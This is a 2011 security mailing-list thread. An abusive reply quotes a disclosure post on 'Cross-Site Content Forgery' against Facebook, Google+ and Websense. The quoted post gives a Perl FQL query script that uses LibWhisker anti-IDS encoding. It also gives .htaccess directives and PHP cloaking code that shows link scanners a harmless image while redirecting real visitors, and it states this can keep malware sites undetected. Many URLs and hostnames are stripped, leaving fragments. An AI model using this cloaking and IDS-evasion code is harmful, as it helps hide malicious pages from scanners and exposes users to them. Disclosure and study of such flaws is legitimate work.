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Message-ID: <>
Date: Sat, 8 Oct 2011 23:45:43 -0400
From: Antony widmal <>
To: Laurelai <>
Subject: Re: Facebook/google+ Cross-Site Content Forgery

Shit man, that's serious business....

(S-K trying to take over FD)

Of course it's not your code dickwad. All ya know is talking & posting shit
on an IT Sec mailing list.

On Sat, Oct 8, 2011 at 7:53 PM, Laurelai <> wrote:

>  Blackhatacademy has asked me to post this to the mailing list as im one of
> the instructors there, I did not personally develop the exploit, please
> direct questions regarding it to hatter on
> Overview
> Over the years, facebook has been vulnerable to numerous web exploitation<>techniques, such as
> XSS <>, FQL
> injection (similar to SQL injection<>),
> application worms, and redirect protection bypass. Because they continue to
> attempt to write their own language implementations, they are repeatedly
> vulnerable. Security by obscurity doesn't work if they document their own markup
> language <> and query
> language <> for
> attackers.  History
> XSS <> in
> facebook first started out as a flaw in their fbml<>markup and subsequently became evident in a variety of facebook
> applications. Applications<>also exposed users to third party attacks that could affect a user's web
> browser or force actions as the affected user. Now there is a way to bypass
> content restrictions on links and posts put on a user's public wall.
> Facebook was notified of these vulnerabilities<>on July 31st, 2011. To date (October 4, 2011) Facebook has yet to do
> anything about this; demonstrating a deplorable lack of reasonable care for
> all of their users. For this reason, the vulnerability<>proof of concept code is being brought to light. Facebook has only recently
> purchased websense to attempt to push this vulnerability under the rug,
> however the exploit still works.
>  FQL
> Simply requiring an API key for privileged queries does not protect
> facebook from people arbitrarily obtaining one. Facebook was even so kind as
> to give a reference of tables and columns in the documentation for FQL. To
> access Facebook's FQL API, it takes only a well-formed HTTP request with an
> embedded API key to return a valid XML object. FQL Does not allow the use of
> JOINS, however it is not needed as everything is thoroughly documented.
> Attackers can misuse this during the creation of a malicious facebook
> application or directly on the FQL development api page for information
> gathering. The implementation below uses LibWhisker2 for IDS evasion via
> session splicing.
> #!/usr/bin/perluse warnings;use XML::Simple;use LW2;use Getopt::Std;my %opts;
> getopts('q:',\%opts);my $query = $opts{q} if defined $opts{q};$query = "SELECT pic_big FROM user WHERE uid=6666666" unless defined $opts{q};my $ref = fqlQuery($query);foreach my $parent (sort keys %{$ref}) {
>     if (%{$ref->{$parent}}) {
>         print "$parent: \n";
>         foreach my $key (sort keys %{$ref->{$parent}}) {
>             if (%{$ref->{$parent}->{$key}}) {
>            print "\t$key : \n";
>                foreach my $mojo (sort keys %{$ref->{$parent}->{$key}}) {
>                    print "\t\t$mojo : ";
>                    print $ref->{$parent}->{$key}->{$mojo};
>            print "\n";
>            }
>             } else {   print "\t$key : ";
>                print $ref->{$parent}->{$key};
>                print "\n";
>             }
>         }
>     } else {
>         print "$parent : " . $ref->{$parent} . "\n";
>     }}sub fqlQuery {
>     my $q = shift;
>     $q =~ s/ /%20/g;
>     my $link = "$q" <$q>;
>     my $text = download($link,"");
>     my $ref  = XMLin($text);
>     return($ref);}sub download{
>     my $uri = shift;
>     my $try = 5;
>     my $host = shift;
>     my %request;
>     my %response;
>     LW2::http_init_request(\%request);
>     $request{'whisker'}->{'method'} = "GET";
>     $request{'whisker'}->{'host'} = $host;
>     $request{'whisker'}->{'uri'} = $uri;
>     $request{'whisker'}->{'encode_anti_ids'} = 9;
>     $request{'whisker'}->{'user-agent'} = "";
>     LW2::http_fixup_request(\%request);
>     if(LW2::http_do_request(\%request, \%response)) {
>         if($try < 5) {
>             print "Failed to fetch $uri on try $try. Retrying...\n";
>             return undef if(!download($uri, $try++));
>         }
>         print "Failed to fetch $uri.\n";
>         return undef;
>     } else {
>         return ($response{'whisker'}->{'data'}, $response{'whisker'}->{'data'});
>     }}
>   Content Forgery
> While most major sites that allow link submission are vulnerable to this
> method, sites including websense, google+, and facebook make the requests
> easily identifiable. These sites send an initial request to the link in
> order to store a mirror thumbnail of the image, or a snapshot of the website
> being linked to. In doing so, many use a custom user agent, or have IP
> addresses<>that resolve to a consistant domain name. Facebook IP
> addresses<>resolve to
>, also set a custom user agent of "facebookexternalhit". Google+
> (Also notified Jul. 31st and guilty of reasonable care) again follows suit
> and utilizes "Feedfetcher-Google" as their user agent. Knowing this, we can
> easily filter out requests coming from these websites, and offer up a
> legitimate image to be displayed on their site, while redirecting or
> displaying a completely different page to anyone that follows the links.
> Facebook's recent partnership with websense is laughable, due to websense's
> "ACE" security scanner that is just as easily identified, by using
> gethostbyaddr in order to resolve the IP back to Utilizing
> this technique, would allow an overwhelming number of malware sites to
> remain undetected to their automatic site analysis. Other places like
> either spoof a user agent to look like normal traffic, or forward
> the client's user agent, which makes it more difficult to catch every one of
> their requests. Fortunately, only requests the link once, prior
> to submitting the link to the world. This allows attackers to serve up a
> legitimate image until that initial request clears our server, and then
> replace it with a less than honest file. We have affectionately named this
> vulnerability class Cross-Site Content Forgery<>.
>  Screenshots & Video
>  Facebook <> Google+ <> Youtube video of PoC for both <>
> CIDR ranges can also be checked as well. A list of netranges is below,
> followed by an htaccess and PoC code for a jpeg file.
>  Websense
> *ASN 13448*
>  2605:7000::/32
>  2620:0:C0::/48
>  Facebook
> *ASN 32934/54115*
>  2620:0:1C00::/48
>  Proof of Concept
> In order to exploit this flaw, JPG images will need to have a custom
> mimetype returned. This can be accomplished via the following .htaccess
> directives:
>  AddType x-httpd-php .jpg
>  AddHandler application/x-httpd-php .jpg
>  <?php# User agent checking methods$fb_string = '/facebookexternal/i';                # facebookexternal shows in the facebook content scanner's user agent$gplus_string = '/Feedfetcher-Google/i';       # googleplus shows up in the user agent as well.# rDNS Lookup Methods$host_websense = '/';         # Checking the rdns for websense filters$host_fb = '/';                              # Checking the rdns for - facebook host# Load the request properties$u_agent = $_SERVER['HTTP_USER_AGENT'];$u_ref     = $_SERVER['HTTP_REFERER'];$u_host  = gethostbyaddr($_SERVER['REMOTE_ADDR']);# If we're coming from or facebook or websense or google plus, if (preg_match($host_fb,$u_host) || preg_match($host_websense,$u_host) || preg_match($fb_string,$u_agent) || preg_match($gplus_string,$u_agent)) {
>     # Display an image    header('Content-Type: image/jpeg');
>     @readfile ('/var/www/localhost/cute_kitten.jpeg');} else {
>     # Rickroll this unsuspecting user    header('Location:');}?>
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